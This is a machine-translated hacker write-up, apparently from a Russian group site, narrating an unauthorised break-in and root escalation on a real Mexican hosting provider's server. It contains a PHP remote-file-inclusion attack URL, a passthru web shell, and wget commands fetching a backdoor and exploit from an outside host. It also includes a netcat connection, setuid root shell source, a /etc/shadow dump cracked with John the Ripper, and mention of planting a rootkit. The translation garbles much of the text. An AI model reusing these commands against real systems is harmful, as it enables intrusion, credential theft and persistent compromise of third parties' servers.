This page has been robot translated, sorry for typos if any. Original content here.

Root on a hosting provider


Intro.
I decided to describe this particular hack, because it happened quite a while ago (and, at that moment, January 23, 03 the server is still in DHG's hands, so to speak) I was also asked to describe some interesting hack.
I don’t want this story to be a guide for other people's atrocities, so we intentionally make some mistakes / inaccuracies (which, however, any advanced user will notice). Well, also to chew on elementary things, such as “Linux teams also in what place to look for how to compile splits”, we will not do it. So let's go.

Round # 1: remote.
In general, the original target was the Mexican Linux portal www. ***. Com, which was once hosted by this provider.
First of all, it was necessary to find out the axis on which this portal stands. Although, the stump is clear that the site about Linux'e can not hang on Windows. On http was: "Apache / 1.3.26 (Unix) (Red Hat / Linux) Chili! Soft-ASP / 3.6.2 PHP / 4.1.2", the ftp banner read:
managedhosting FTP server (Version 6.5 / OpenBSD, linux port 0.3.2) ready.
We did not begin to scan ports, cgi-bugs, and also any such nonsense - more precisely, I decided to postpone it for later. Well, I also did not want to cover essno in any way. So, the phrase "hosting" flashed in the ftp banner! Having scored on ripnet, we decided to turn directly to ip, which was www. ***. Com. He brought me to the site "managedhosting.dialtoneinternet.com.mx", which, obviously, was his hoster. Later, a short manual bruteforce was calculated on a real hosting site: dialtoneinternet.com.mx (www.dialtone.com).
On this, we decided to stop for the time being and also return to the site being broken. He stood on the phpWebSite PHP engine of an unknown version. This next clone of php-nuke'a did not differ in any special emphasis on security. All versions of PWS up to 0.8.2 (even marked as Stable) had a vulnerability of the 'Php source injection' class. For those who don’t say anything, see r4ShRaY's article on this vulnerability. The rest, read on. So, here is a slice of the modsecurity.php file sors:

<? php
global $ inc_prefix;
if (! $ inc_prefix) {
...
}
...
include_once ($ inc_prefix. "htmlheader.php");
?>

IMHO, everything should be clear to everyone here. By running this script in a similar way:
http: //www.***.com/modsecurity.php? inc_prefix = http: //www.dhgroup.org
The htmlheader.php file located on our site will execute with so far undefined rights. The only thing that bothered me was that the attacked site had a patched, or a newer version (after all, this was not some kind of 'Vasya's home page', but a portal for kewl-Linux-userz).
In general, we created the htmlheader.php file on our site with this content:

<? passthru ("$ cmd")?>

Then I went to the address:
modsecurity.php? inc_prefix = http: //www.dhgroup.org&cmd=ls
To which we got a listing of the www directory. # Note further I will scribble all commands without "...? inc_prefix = http: // ..."!

Round # 2: local.
> echo hi> kewl.txt; cat kewl.txt
The browser responded to these two commands with an empty snowy-white screen. This indicated that I did not have write permissions to the www directory. That is, to express about deface so far early. Well, before taking any further action, it was necessary to collect more information about the system. The main occupation we climbed over the httpd.conf file:
> cat /etc/httpd/conf/httpd.conf
From there we torn out the front-end version (by the way, the 'Server' http-header was silent about FrontPage being available) also the route to the website’s www directories: dialtoneinternet.com.mx (a broken hosting provider), stormarketing.com, altavistablinds.com, parigitown.com, well, also to a few large resources:
# -FrontPage- version = 4.0
##
## httpd.conf - Apache HTTP server configuration file
##
...
<VirtualHost 66.33.62.88>
<Directory / home / admin / www / serversecure>
Options all
AllowOverride All
</Directory>
ServerName dialtoneinternet.com.mx
ServerAlias ​​www.dialtoneinternet.com.mx
DocumentRoot / home / admin / www
ErrorLog logs / error_log
TransferLog logs / transfer_log
Group nobody
ScriptAlias ​​/ cgi-bin / / home / admin / www / cgi-bin /
</VirtualHost>
...
Of course, there is not enough rights to defuse them, BUT they are quite enough to view the front-end service.pwd (if any) of these sites, with all the consequences that follow from here;) We left this opportunity for that adventure, if I still in no way will it be possible to raise their privileges.
Further, for interest, we introduced:
> netstat -a
What I received (# - my tags):
  Active Internet connections (servers and established)
 Proto Recv-Q Send-Q Local Address Foreign Address State 
 tcp 0 1 66.33.62. *: 2114 by.ru:www LAST_ACK # (1)
 tcp 0 0 66.33.62. *: www 62.141.75.226{116 ESTABLISHED 
 tcp 0 0 *: www *: * LISTEN 
 tcp 0 0 *: imap2 *: * LISTEN 
 tcp 0 0 *: pop3 *: * LISTEN 
 tcp 0 0 *: ftp *: * LISTEN 
 tcp 0 0 *: 81 *: * LISTEN 
 tcp 0 0 *: https *: * LISTEN # (2)
 tcp 0 0 managedhosting.d: domain *: * LISTEN 
 tcp 0 0 managedhosting2.:domain *: * LISTEN 
 tcp 0 0 spacebattles.net:domain *: * LISTEN 
 tcp 0 0 66.33.62. *: domain *: * LISTEN 
 tcp 0 0 localhost.locald: domain *: * LISTEN 
 tcp 0 0 *: smtp *: * LISTEN 
 tcp 0 0 *: mysql *: * LISTEN 
 tcp 0 0 *: casp3001 *: * LISTEN 
 tcp 0 0 *: casp3000 *: * LISTEN 
 tcp 0 0 *: casp5105 *: * LISTEN 
 tcp 0 0 *: casp5103 *: * LISTEN 
 tcp 0 0 *: casp5104 *: * LISTEN 
 tcp 0 0 *: 1581 *: * LISTEN 
 tcp 0 0 *: 1024 *: * LISTEN 
 tcp 0 0 *: ssh *: * LISTEN # (3)
 udp 0 0 *: 4320 *: * 
 udp 0 0 managedhosting.d: domain *: * 
 udp 0 0 managedhosting2.:domain *: * 
 udp 0 0 spacebattles.net:domain *: * 
 udp 0 0 66.33.62. *: domain *: * 
 udp 0 0 localhost.locald: domain *: * 
 raw 0 0 *: udp *: * 7 
 raw 0 0 *: tcp *: * 7 
 raw 0 0 *: icmp *: * 7 
 raw 0 0 *: tcp *: * 7 
 Active UNIX domain sockets (servers and established)
 Proto RefCnt Flags Type State I-Node Path
 unix 0 [ACC] STREAM LISTENING 552166 /home/httpsd/cache/ssl.socket
 unix 0 [ACC] STREAM LISTENING 2087 /tmp/mysql.sock
 unix 4 [] DGRAM 290 / dev / log
 unix 0 [ACC] STREAM LISTENING 549144 / var / run / ndc
 unix 0 [] STREAM 565939 
 unix 0 [] DGRAM 555692 
 unix 0 [] DGRAM 549142 
 unix 0 [] DGRAM 3193 
 unix 0 [] DGRAM 303 
(1) - this is us =)
(2) - the presence of ssl usually expresses the exchange of private information with the server (cc, for example). Although, for hosting it is in the routine of things.
(3) - here he is! He will come in handy later.
Here also the ports did not need to be scanned :)
Next, it was necessary to start some specific actions, or rather, to find out at least almost the version of the cap plus, on the basis of this, already dance on. So, for those who do not know, some (if not all) Linux distributions leave the file "* -release" (where * is the name of the distribution: mandrake-release, cobalt-release ...) in the / etc / directory also admins have no way to eliminate it.
> cat / etc / redhat-release:
Red Hat Linux release 6.1 (Cartman)
Obaaaaaa, I must say, this we did not expect :) Everything else blah blah was a matter of technology .. To achieve the long-awaited root, we decided to use the RedHat vulnerability in rcp.

Red Hat 6.2: rcp possible root hole
In fact, the vulnerability was found in cap 6.2 .. About 6.1, a post from Andrew Griffiths and Tlabs did not say a word. Hoping for luck, we introduced:
> ls -alF `which rcp`
-rwsr-xr-x 1 root root 14868 Jul 30 1999 / usr / bin / rcp *
Oops! Sure rcp owns a room to be! That's already good :) I poured myself "rcpsploit.pl" from tlabs plus, having studied the source, I stopped. I’ll perhaps explain how this sploit works - perhaps this will help you understand the essence of the vulnerability of the problem that has also arisen.
So, it creates 2 files:
/tmp/shell.c---------------------

#include
#include
int main ()
{
setuid (0);
setgid (0);
execl ("/ bin / sh", "sh", 0);
return 0;
}


hey ------------------------------
Sploit written by tlabs, thanks to Andrew Griffiths for the bug report

Then, through the succesful rcp, the sploit compile shell.c also acts as chmod like this with the chmod. That's it! We start the compiled shell also we get a shell with uid = 0, gid = 0. But what is the use of this shell if we execute commands through a web server? : - /
It was only allowed to force this sploit to work on a "normal" shell.
Well, do you need a shell? He will! In my warez-archive a long time ago a small pearl barley trojan was gathering dust, which we also decided to use:
> wget -o = / tmp / .tmp.pl http://www.dhgroup.org/exp/backhole.pl
> chmod 755 /.tmp/tmp.pl
> perl /tmp/.tmp.pl
Next on your computer:
> nc ***. com 51015
Touching:
> cd / tmp
> wget -c http://www.dhgroup.org/exp/rcpsploit.pl
> chmod 755 rcpsploit.pl; perl rcpsploit.pl
Ok, too easy, we'll just launch a shell, lets hope shit went well innit :)
> id
uid = 0 (root) gid = 0 (root) groups = 0 (root), 1 (bin), 2 (daemon), 3 (sys), 4 (adm), 6 (disk), 10 (wheel)
That's all :) Well, also the last:
> cat / etc / shadow
root: ###: 11961: 0: 99999: 7: -1: -1: 134549964
bin: *: 10925: 0: 99999: 7 :::
daemon: *: 10925: 0: 99999: 7 :::
adm: ###: 11577: 0: 99999: 7: -1: -1: 134549852
... etc ...
JTR counted 977 passwords%) To speed up the search, we introduced:
john -i: all -u: root shadow
About 8 hours and ... the long-awaited moment:




Then I uploaded lrk there, several datapipes and bnc too ... although this is a completely different story ....

What was used during hacking:
Netscape v.xz
secureCRT 3.1
Netcat
John the ripper
backhole.pl
rcpsploit.pl
Brain
PacketStormSecurity

Conclusions \ remarks \ comments:
1. If this or that server importantly calls itself the Hosting provider or the Linux portal - this does not mean that it is well protected.
2. In the process of hacking, you should not particularly declare your ip (this will be an article in the future).
3. When hacking, the so-called "hacker" software was almost never used.
4. RH6. * - do not eat buzzing :)

PS IMHO, the reader may get the impression that I was just lucky and the general hack took a couple of minutes .. This is not the case. There were moments at which time hands just dropped, at what time I wanted to fight my head against the wall.

Posted by: D4rkGr3y


Material published with permission of DHGROUP (http://www.dhgroup.org)